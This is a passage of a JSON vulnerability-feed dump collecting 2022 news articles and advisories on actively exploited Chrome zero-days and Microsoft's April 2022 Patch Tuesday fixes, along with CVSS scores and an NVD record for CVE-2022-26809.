"cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-05T02:55:00", "type": "thn", "title": "Update Google Chrome Browser to Patch New Zero-Day Exploit Detected in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294"], "modified": "2022-07-05T13:54:52", "id": "THN:2E90A09BA23747C57B4B5C9ED7D13ED9", "href": "https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T15:25:34", "description": "Google on Tuesday rolled out 
patches for Chrome browser for desktops to contain an actively exploited high-severity zero-day flaw in the wild.\n\nTracked as **CVE-2022-2856**, the issue has been described as a case of insufficient validation of untrusted input in [Intents](<https://www.chromium.org/developers/web-intents-in-chrome/>). Security researchers Ashley Shen and Christian Resell of Google Threat Analysis Group have been credited with reporting the flaw on July 19, 2022.\n\nAs is typically the case, the tech giant has refrained from sharing additional specifics about the shortcoming until a majority of the users are updated. \"Google is aware that an exploit for CVE-2022-2856 exists in the wild,\" it [acknowledged](<https://chromereleases.googleblog.com/2022/08/stable-channel-update-for-desktop_16.html>) in a terse statement.\n\nThe latest update further addresses 10 other security flaws, most of which relate to use-after-free bugs in various components such as FedCM, SwiftShader, ANGLE, and Blink, among others. Also fixed is a heap buffer overflow vulnerability in Downloads.\n\nThe development marks the fifth zero-day vulnerability in Chrome that Google has resolved since the start of the year -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-2294**](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) \\- Heap buffer overflow in WebRTC\n\nUsers are recommended to update to version 104.0.5112.101 for macOS and Linux and 104.0.5112.102/101 for Windows to mitigate potential threats. 
Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-17T12:02:00", "type": "thn", "title": "New Google Chrome Zero-Day Vulnerability Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856"], "modified": "2022-08-17T13:41:27", "id": "THN:EDC4E93542AFAF751E67BF527C826DA4", "href": "https://thehackernews.com/2022/08/new-google-chrome-zero-day.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-06T06:03:15", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgU5EpzvY9cLJdxPDYZpGhcMcZv4NWQKy-E_SphleQYJBz0-RK17I0vcuTEA4Y7j4FLYJZoocDlfvBAGQ9PLUcM-tSqm41GrfaPqhrzTyHbGiRLa0OW_IOvDb-6EfqX7V_LIzm1t5P_xj2by6ZVqAFz5d_bJ42p_faEgP_-St1X8fjuiAh0iW2Ak_Om/s728-e100/chrome-update.jpg>)\n\nGoogle on Friday shipped emergency fixes to address a security vulnerability in the Chrome web browser that it said is being actively exploited in the wild.\n\nThe issue, assigned the identifier **CVE-2022-3075**, concerns a case of insufficient data validation in [Mojo](<https://chromium.googlesource.com/chromium/src/+/HEAD/mojo/README.md>), which refers to a collection of runtime libraries that provide a platform-agnostic mechanism for inter-process communication (IPC).\n\nAn anonymous researcher has been credited with reporting the high-severity flaw on August 30, 2022.\n\n\"Google is aware of reports that an exploit for CVE-2022-3075 exists in the wild,\" the internet giant [said](<https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop.html>), without delving into additional specifics about the nature of the attacks to prevent additional threat actors from taking advantage of the flaw.\n\nThe latest update makes it the sixth zero-day vulnerability in Chrome that Google has resolved since the start of the year -\n\n * [CVE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [CVE-2022-1096](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [CVE-2022-1364](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [CVE-2022-2294](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) \\- Heap buffer overflow in WebRTC\n * [CVE-2022-2856](<https://thehackernews.com/2022/08/new-google-chrome-zero-day.html>) \\- Insufficient validation of untrusted input in 
Intents\n\nUsers are recommended to upgrade to version 105.0.5195.102 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-03T03:56:00", "type": "thn", "title": "Google Releases Urgent Chrome Update to Patch New Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075"], "modified": "2022-09-06T04:20:05", "id": "THN:0ADE883013E260B4548F6E16D65487D3", "href": "https://thehackernews.com/2022/09/google-release-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], 
"krebs": [{"lastseen": "2022-04-19T21:33:35", "description": "\n\n**Microsoft** on Tuesday released updates to fix roughly 120 security vulnerabilities in its **Windows** operating systems and other software. Two of the flaws have been publicly detailed prior to this week, and one is already seeing active exploitation, according to a report from the **U.S. National Security Agency** (NSA).\n\nOf particular concern this month is [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24521>), which is a "privilege escalation" vulnerability in the Windows common log file system driver. In its advisory, Microsoft said it received a report from the NSA that the flaw is under active attack.\n\n\u201cIt\u2019s not stated how widely the exploit is being used in the wild, but it\u2019s likely still targeted at this point and not broadly available," assessed **Dustin Childs** with Trend Micro's Zero Day Initiative. "Go patch your systems before that situation changes.\u201d\n\nNine of the updates pushed this week address problems Microsoft considers "critical," meaning the flaws they fix could be abused by malware or malcontents to seize total, remote access to a Windows system without any help from the user.\n\nAmong the scariest critical bugs is [CVE-2022-26809,](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809>) a potentially "wormable" weakness in a core Windows component (**RPC**) that earned a CVSS score of 9.8 (10 being the worst). 
Microsoft said it believes exploitation of this flaw is more likely than not.\n\nOther potentially wormable threats this month include [CVE-2022-24491](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24497>), Windows **Network File System** (NFS) vulnerabilities that also clock in at 9.8 CVSS scores and are listed as \"exploitation more likely by Microsoft.\"\n\n\"These could be the kind of vulnerabilities which appeal to ransomware operators as they provide the potential to expose critical data,\" said **Kevin Breen**, director of cyber threat research at **Immersive Labs**. \"It is also important for security teams to note that NFS Role is not a default configuration for Windows devices.\"\n\nSpeaking of wormable flaws, [CVE-2022-24500](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24500>) is a critical bug in the **Windows Server Message Block** (SMB).\n\n\"This is especially poignant as we approach the anniversary of WannaCry, which famously used the EternalBlue SMB vulnerability to propagate at great pace,\" Breen added. \"Microsoft advises blocking TCP port 445 at the perimeter firewall, which is strong advice regardless of this specific vulnerability. While this won't stop exploitation from attackers inside the local network, it will prevent new attacks originating from the Internet.\"\n\nIn addition, this month's patch batch from Redmond brings updates for **Exchange Server**, **Office**, **SharePoint Server**, **Windows Hyper-V**, **DNS Server**, **Skype for Business**, **.NET** and **Visual Studio**, **Windows App Store**, and **Windows Print Spooler** components.\n\nAs it generally does on the second Tuesday of each month, **Adobe** released four patches addressing 70 vulnerabilities in **Acrobat** and **Reader**, **Photoshop**, **After Effects**, and **Adobe Commerce**. 
More information on those updates is available [here](<https://helpx.adobe.com/security.html>).\n\nFor a complete rundown of all patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+April+2022+Patch+Tuesday/28542/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/2022/march-madness-patching-begins/>) usually has the lowdown on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these patches, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T15:01:24", "type": "krebs", "title": "Microsoft Patch Tuesday, April 2022 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491", 
"CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-26809"], "modified": "2022-04-13T15:01:24", "id": "KREBS:4BE9D01404C10748F3DE7B41B5A18613", "href": "https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-04-19T21:28:45", "description": "It\u2019s that time of the month again. Time to check what needs to be updated and prioritize where necessary. The Microsoft updates include at least two zero-day vulnerabilities that deserve your attention.\n\n## Microsoft\n\nMicrosoft has released security updates and non-security updates for client and server versions of its Windows operating system and other company products, including Microsoft Office and Edge.\n\nFor those that have extended support for Windows 7, there are four critical remote code execution (RCE) vulnerabilities to worry about:\n\n * [CVE-2022-24500](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24500>) [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) 8.8 out of 10, a Windows SMB Remote Code Execution vulnerability\n * [CVE-2022-24541](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24541>) CVSS 8.8, a Windows Server Service Remote Code Execution vulnerability\n * [CVE-2022-26809](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26809>) CVSS 9.8, a Remote Procedure Call Runtime Remote Code Execution vulnerability\n * [CVE-2022-26919](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26919>) CVSS 8.1, a Windows LDAP Remote Code Execution vulnerability\n\nCVE-2022-26809 does have a CVSS of 9.8 for good reason. It affects almost every Windows OS and Microsoft has it listed as more likely to be exploited. To exploit this vulnerability, an attacker would need to send a specially crafted RPC call to an RPC host. 
This could result in remote code execution on the server side with the same permissions as the RPC service. TCP port 445 is used to initiate a connection with the affected component. And some quick Shodan scans showed that millions of systems have that port open.\n\n> We've learned nothing.  \nCVE-2022-26809 is going to ruin some weekends.<https://t.co/mD6irwPdUs>[#CyberSecurity](<https://twitter.com/hashtag/CyberSecurity?src=hash&ref_src=twsrc%5Etfw>) [pic.twitter.com/szPhauAIrv](<https://t.co/szPhauAIrv>)\n> \n> -- Jon Gorenflo  (@flakpaket) [April 12, 2022](<https://twitter.com/flakpaket/status/1514029843335237636?ref_src=twsrc%5Etfw>)\n\nMicrosoft classifies a vulnerability as a zero-day if it is publicly disclosed or actively exploited with no official fix available. The zero-day vulnerabilities fixed in this update cycle are:\n\n * [CVE-2022-26904](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26904>) CVSS 7.0, a Windows User Profile Service Elevation of Privilege (EoP) vulnerability. This one is marked with a high attack complexity, because successful exploitation of this vulnerability requires an attacker to win a race condition. But the vulnerability is public knowledge and there is an existing Metasploit module for it. Metasploit is an open-source penetration framework used by security engineers as a penetration testing system and a development platform that allows users to create security tools and exploits.\n * [CVE-2022-24521](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24521>) CVSS 7.8, a Windows Common Log File System Driver Elevation of Privilege vulnerability. This vulnerability has been used in the wild. Microsoft says that attack complexity is low. 
The vulnerability was reported to Microsoft by the National Security Agency (NSA) and Crowdstrike.\n\nOther notable CVEs:\n\n * [CVE-2022-24491](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24491>) CVSS 9.8, a Windows Network File System Remote Code Execution vulnerability. This vulnerability is only exploitable for systems that have the [NFS role](<https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview>) enabled. An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution.\n * [CVE-2022-24997](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24997>) CVSS 9.8, another Windows Network File System Remote Code Execution vulnerability. This vulnerability is only exploitable for systems that have the NFS role enabled. An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution.\n\nOn these systems with the NFS role enabled, a remote attacker could execute their code with high privileges and without user interaction. This worries experts as these may turn out to be wormable bugs between NFS servers. For a temporary solution, more information on installing or uninstalling Roles or Role Services is available [here](<https://docs.microsoft.com/en-us/windows-server/administration/server-manager/install-or-uninstall-roles-role-services-or-features#install-roles-role-services-and-features-by-using-the-add-roles-and-features-wizard>).\n\nA vulnerability is considered to be wormable if an attack can be launched that requires no human interaction to spread. The impact can be considerable if the number of vulnerable machines is high enough. 
In these cases web application firewalls (WAFs) would help to mitigate the risk.\n\nIn related news, Microsoft [announced](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/get-current-and-stay-current-with-windows-autopatch/ba-p/3271839>) the release of Windows Autopatch, which is set for July 2022. This will hopefully lessen some of the burdens that come with [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>).\n\n## Edge and Chrome\n\nThe Microsoft updates included 26 Microsoft Edge vulnerabilities and Google released a stable channel update for Windows, Mac, and Linux that includes 11 security fixes. Eight out of those 11 were rated with a High severity, none were marked as Critical.\n\n## Other updates\n\nWhile you're at it, we also saw updates from vendors like:\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [VMWare](<https://core.vmware.com/vmsa-2022-0011-questions-answers-faq#section1>)\n\nStay safe, everyone!\n\nThe post [April's Patch Tuesday update includes fixes for two zero-day vulnerabilities](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/aprils-patch-tuesday-update-includes-fixes-for-two-zero-day-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T13:57:39", "type": "malwarebytes", "title": "April\u2019s Patch Tuesday update includes fixes for two zero-day vulnerabilities", "bulletinFamily": 
"blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24541", "CVE-2022-24997", "CVE-2022-26809", "CVE-2022-26904", "CVE-2022-26919"], "modified": "2022-04-13T13:57:39", "id": "MALWAREBYTES:EF0C1E45728B8347B58DBE1D76A5F156", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/aprils-patch-tuesday-update-includes-fixes-for-two-zero-day-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T15:40:03", "description": "Google has [urged](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>) its 3 billion+ users to update to Chrome version 99.0.4844.84 for Mac, Windows, and Linux to mitigate a zero-day that is currently being exploited in the wild. 
This is in response to a bug reported by an anonymous security researcher last week.\n\nThe flaw, which is tracked as [CVE-2022-1096](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1096>), is a \"Type Confusion in V8\" and is rated as high severity, meaning that it's necessary for everyone using Chrome to update as quickly as possible because of the damage attackers could cause once they exploit this.\n\nNot much is known about the vulnerability itself or how great the impact would be if exploited, but the unusual release of this patch, which notably addresses just one vulnerability, means that this update shouldn't be ignored.\n\nGoogle is always cautious to release more details until the majority of users are updated with a fix. Google says it [may take weeks](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>) before the update reaches its entire user base.\n\n## How to update\n\nThe easiest way to update is to allow Chrome to do it automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.\n\nSo, it doesn\u2019t hurt to check now and then. And now would be a good time.\n\nMy preferred method is to have Chrome open the page **chrome://settings/help** which you can also find by clicking **Settings > About Chrome**.\n\nIf there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is relaunch the browser.\n\n## Microsoft Edge\n\nMicrosoft has [confirmed](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>) that Edge, a Chromium-based browser, is also affected by this vulnerability. Edge users should urgently update their browsers to version 99.0.1150.55, which is not vulnerable to the flaw.\n\nThe post [Update now! 
Google releases emergency patch for Chrome zero-day used in the wild](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-03-28T13:42:54", "type": "malwarebytes", "title": "Update now! Google releases emergency patch for Chrome zero-day used in the wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2022-03-28T13:42:54", "id": "MALWAREBYTES:3203C761121FB47FC676CC2505B4A9FD", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-06T00:03:08", "description": "On Friday, Google [announced](<https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop.html>) the release of a new version of its Chrome browser that includes a security fix for a zero-day tracked as [CVE-2022-3075](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3075>). As with previous announcements, technical details about the vulnerability won't be released until a certain number of Chrome users have already applied the patch.\n\nGoogle is urging its Windows, Mac, and Linux users to update Chrome to version** 105.0.5195.102**.\n\nCVE-2022-3075 is described as an \"[i]nsufficient data validation in Mojo\". According to Chromium documents, Mojo is \"a collection of runtime libraries" that facilitates interfacing standard, low-level interprocess communication (IPC) primitives. Mojo provides a platform-agnostic abstraction of these primitives, which comprise most of Chrome's code.\n\nAn anonymous security researcher is credited for discovering and reporting the flaw.\n\nCVE-2022-3075 is the sixth zero-day Chrome vulnerability Google had to address. 
The previous ones were:\n\n * [C](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>)[VE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>), a Use-after-Free (UAF) vulnerability, which was patched in February\n * [CVE-2022-1096](<https://www.malwarebytes.com/blog/news/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild>), a \"Type Confusion in V8\" vulnerability, which was patched in March\n * [CVE-2022-1364](<https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-zero-day-used-in-attacks/>), a flaw in the V8 JavaScript engine, which was patched in April\n * [CVE-2022-2294](<https://www.malwarebytes.com/blog/news/2022/07/update-now-chrome-patches-another-zero-day-vulnerability>), a flaw in the Web Real-Time Communications (WebRTC), which was patched in July\n * [CVE-2022-2856](<https://www.malwarebytes.com/blog/news/2022/08/update-chrome-now-google-issues-patch-for-zero-day-spotted-in-the-wild>), an insufficient input validation flaw, which was patched in August\n\nGoogle Chrome needs minimum oversight as it updates automatically. However, if you're in the habit of not closing your browser or have extensions that may hinder Chrome from automatically doing this, please check your browser every now and then.\n\nOnce Chrome notifies you of an available update, don't hesitate to download it. 
The patch is applied once you relaunch the browser.\n\n\n\nStay safe!", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-05T16:30:00", "type": "malwarebytes", "title": "Zero-day puts a dent in Chrome's mojo", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075"], "modified": "2022-09-05T16:30:00", "id": "MALWAREBYTES:08FDD3DEF41B63F1DEB23C21DCFDB12D", "href": "https://www.malwarebytes.com/blog/news/2022/09/update-chrome-asap-a-new-zero-day-is-already-being-exploited", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-05-27T14:34:08", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24492, CVE-2022-24528.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26809", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809"], "modified": "2022-04-19T18:37:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-26809", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26809", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", 